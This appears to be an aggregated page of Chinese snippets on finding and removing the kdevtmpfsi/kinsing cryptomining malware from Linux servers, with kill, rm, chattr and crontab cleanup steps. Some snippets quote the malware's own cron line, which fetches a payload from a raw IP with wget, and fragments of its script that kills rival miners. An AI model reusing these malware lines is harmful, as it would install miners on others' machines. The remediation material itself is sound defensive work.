服务器CPU被跑满了,是一个名为‘kdevtmpfsi’的程序 无耻啊!!!...第一步 删除 /tmp/kdevtmpfsi和他的守护进程kinsing #查询关联的守护进程 systemctl status 2854(进程号) 第二步 查看定时任务程序 删除/var/spool.../cron/crontabs/下的文件,注意使用sudo su 下面是无耻的定时任务: 截屏2019-12-31下午1.40.37.png 第三步 kill kdevtmpfsi kill kinsing
木马文件通知 一天,突然接收到了腾讯云发的短信和邮件 [ha48e58uhv.png] 解决方案 网上搜索了一下 kdevtmpfsi果真有很多中枪的,也都给出了对应的解决方案。
但也不会占用这么高的CPU吧,一般都是0.3% 看看这个进程什么鬼 systemctl status 14561 然后找到了它的父亲进程 在 /var/tmp/kinsing 删除掉 它 /tmp/kdevtmpfsi
[image.png] 排查方法 首先:查看 kdevtmpfsi 进程,使用 ps -ef | grep kdevtmpfsi ps -ef | grep kinsing命令查看,见下图。...[image.png] PS:通过 ps -ef 命令查出 kdevtmpfsi 进程号,直接 kill -9 进程号并删除 /tmp/kdevtmpfsi 执行文件。...第二步:根据上面结果知道 kdevtmpfsi 进程号是 10393,使用 systemctl status 10393 发现 kdevtmpfsi 有守护进程,见下图。...[image.png] 第三步:kill 掉 kdevtmpfsi 守护进程 kill -9 30903 30904,再 killall -9 kdevtmpfsi 挖矿病毒,最后删除 kdevtmpfsi...执行程序 rm -f /tmp/kdevtmpfsi。
Linux被kdevtmpfsi挖矿病毒入侵 一....错误信息 二.解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4.删除掉kdevtmpfsi的相关文件 三.怎么预防处理这个病毒...有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。...1.首先停掉kdevtmpfsi的程序 ps aux 找到kdevtmpfsi的进程 删除掉与kdevtmpfsi相关的进程 kill -9 20267 kill -9 20367 2.删除Linux...ps -aux | grep kinsing ps -aux | grep kdevtmpfsi kill -9 28244 kill -9 28829 4.删除掉kdevtmpfsi的相关文件 cd
libsystem.so #清除木马病毒 rm -fr /etc/kinsing && touch /etc/kinsing && chattr +ia /etc/kinsing rm -fr /tmp/kdevtmpfsi...&& touch /tmp/kdevtmpfsi && chattr +ia /tmp/kdevtmpfsi #删除服务项目并中止进程 systemctl disable bot.service systemctl...stop bot.service #再次清理 ps aux |grep kinsing|awk '{print $2}'|xargs kill -9 ps aux |grep kdevtmpfsi
image.png 排查方法 首先:查看 kdevtmpfsi 进程,使用 ps -ef | grep kdevtmpfsi ps -ef | grep kinsing命令查看,见下图。...image.png PS:通过 ps -ef 命令查出 kdevtmpfsi 进程号,直接 kill -9 进程号并删除 /tmp/kdevtmpfsi 执行文件。...第二步:根据上面结果知道 kdevtmpfsi 进程号是 10393,使用 systemctl status 10393 发现 kdevtmpfsi 有守护进程,见下图。...image.png 第三步:kill 掉 kdevtmpfsi 守护进程 kill -9 30903 30904,再 killall -9 kdevtmpfsi 挖矿病毒,最后删除 kdevtmpfsi...执行程序 rm -f /tmp/kdevtmpfsi。
top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%。 1.png 2. 此病毒一般会又定时任务脚本。...查找kdevtmpfsi进程与守护进程kinsing。 ps -aux | grep kinsing ps -aux | grep kdevtmpfsi 2.png 4....杀掉进程删除相应的文件 kill -9 17995 10031 rm -rf /tmp/kdevtmpfsi /var/tmp/kinsing 3.png 5.使用find / -name kdevtmpfsi
24665 zd 20 0 710928 265496 672 R 98.0 14.1 3088:23 kdevtmpfsi...00:03:42 /tmp/kinsing [wsx@VM-0-5-centos ~]$ ps -ef | grep kdevtmpfsi wsx 4574 2594 0 19:49 pts.../0 00:00:00 grep --color=auto kdevtmpfsi zd 25128 1 97 8月01 ?...37-09:55:38 /tmp/kdevtmpfsi 查看指定用户的定时任务: $ sudo crontab -e -u zd * * * * * wget -q -O - http://195.3.146.118...sudo kill -9 23244 [wsx@VM-0-5-centos ~]$ sudo rm /tmp/kinsing [wsx@VM-0-5-centos ~]$ sudo rm /tmp/kdevtmpfsi
三、进程死而复生 有帖子说,通过ps命令找到kdevtmpfsi的父进程,将父进程kill掉即可,但是kdevtmpfsi的父进程号是1,这个是系统进程systemd的进程号,kill掉它,系统就挂了...kdevtmpfsi和kinsing资源路径删掉,然后再把两个进程kill掉: # 删文件 rm -rf /tmp/kdevtmpfsi rm -rf /etc/data/kinsing # 杀进程 kill...-9 1089 30082 然而,只是平静了一会儿,发现kdevtmpfsi进程又起来了,kinsing进程也在。。。...和kinsing资源路径 先全局查找kdevtmpfsi和kinsing资源路径 find / -name "kdevtmpfsi" find / -name "kinsing" 然后把找到的路径删掉。...3.关停kdevtmpfsi和kinsing程序 找到kdevtmpfsi和kinsing进程id,然后直接kill -9 kill -9 pid pid 五、检查与防护 通过上述操作后,kdevtmpfsi
27247 0.0 0.0 112728 972 pts/0 D+ 07:47 0:00 grep --color=auto kinsing ps -aux | grep kdevtmpfsi...Ssl 07:46 1:17 /tmp/kdevtmpfsi root 27249 0.0 0.0 112728 980 pts/0 R+ 07:47 0:00 grep...--color=auto kdevtmpfsi pkill -9 kinsing pkill -9 kdevtmpfsi 反复发作 #杀掉以后还会换端口 pkill -9 kinsing [root
排查方法 首先:查看 kdevtmpfsi 进程,使用 ps -ef | grep kdevtmpfsi 命令查看,见下图。 ?...PS:通过 ps -ef 命令查出 kdevtmpfsi 进程号,直接 kill -9 进程号并删除 /tmp/kdevtmpfsi 执行文件。...第三步:kill 掉 kdevtmpfsi 守护进程 kill -9 30903 30904,再 killall -9 kdevtmpfsi 挖矿病毒,最后删除 kdevtmpfsi 执行程序 rm -...f /tmp/kdevtmpfsi。...事后检查 通过 find / -name "*kdevtmpfsi*" 命令搜索是否还有 kdevtmpfsi 文件 查看 Linux ssh 登陆审计日志。
根据该挖矿木马的行为特征和文件特征,确定服务器上存在两个不同家族的挖矿木马,分别为kdevtmpfsi和startMiner新型变种挖矿木马。...通过对kdevtmpfsi木马分析,发现该木马存在守护进程无法直接删除,需首先清除其守护进程kinsing,再对kdevtmpfsi木马进程及其相关恶意文件进行清除。...1.3 应急处置 针对kdevtmpfsi木马清除恶意程序文件/tmp/kdevtmpfsi、/var/tmp/ kdevtmpfsi、/etc/spool/cron/root、/home/weblogic.../Oracle/Middleware/user_projects/domains/base_domain/bin下恶意文件以及恶意进程kdevtmpfsi、kinsing。...2.2 Kdevtmpfsi木马分析处理 2.2.1 处理过程 查看kdevtmpfsi进程的网络连接,发现同样连接了矿池在进行挖矿,如下: ? ?
前言 前一阵子,阿里云服务器促销,买了一台2G的主机来做测试学习用,搭好环境后基本就没怎么管它,最近发现CPU总是跑满,,于是按CPU消耗排序,排在第一的是一个名为“kdevtmpfsi”的进程,查了一下是一个挖矿木马...ps -ef |grep kdevtmpfsi 直接kill -9 (PID) 把这个线程干掉了 过一阵子又回来了........甚至 find / -name kdevtmpfsi 发现在 /tmp/kdevtmpfsi 这个文件 然后我们 rm -rf /tmp/kdevtmpfsi 把这个文件删除了 这么一小段时间会没有问题...然后直接kill - 9(Pid) 杀死这俩个线程 find / -name kdevtmpfsi find / -name kinsing 7后记 相信通过上图的现实,你已经知道木马是怎么进来的了,是利用
02、分析排查 (1)使用top命令查看,发现kdevtmpfsi进程异常,CPU占用率199%。 (2)通过进程PID和USER查看进程信息,通过进程链定位到进程所在容器的进程PID。...如下图:异常进程kdevtmpfsi(PID:5613)对应的父进程为JAVA进程(PID:2301)。据此,可初步判断,java应用被入侵,导致容器被植入挖矿木马。
echo 1 > /tmp/kdevtmpfsi chattr +i /tmp/kdevtmpfsi sleep 1 chattr -i /tmp/redis2 echo 1 > /tmp/redis2...-z "$KINSING2" ]; then chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null tntrecht -i /tmp/kdevtmpfsi...2>/dev/null 1>/dev/null chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null pkill -f /tmp/kdevtmpfsi 2>/...null 1>/dev/null kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null echo " " > /tmp/kdevtmpfsi 2>/...chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null tntrecht +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
接下来删除kdevtmpfsi文件,一般在tmp目录下 还有一个文件(kinsing)我们也要将其杀死删掉 这里需要注意,我试了几台服务器kinsing文件可能存在不同的位置,但是我们可以通过上面的方式看到文件路径
netvhost killall netvhost pkill -f kthreadds killall kthreadds pkill -f kthreadd killall kthreadd pkill -f kdevtmpfsi...killall kdevtmpfsi pkill -f linuxservice killall linuxservice pkill -f rtmonitor killall rtmonitor pkill
-f nginxk pkill -f chattr -iau /tmp/lok chmod +700 /tmp/lok rm -rf /tmp/lok sleep 1 chattr -i /tmp/kdevtmpfsi...echo 1 > /tmp/kdevtmpfsi chattr +i /tmp/kdevtmpfsi sleep 1 chattr -i /tmp/redis2 echo 1 > /tmp/redis2
查看进程中第二单词为PID(这里关闭的进程较多,只列举其中一些): ps auxf|grep kinsing| awk '{print $2}'|xargs kill -9 ps auxf|grep kdevtmpfsi
领取专属 10元无门槛券
手把手带您无忧上云
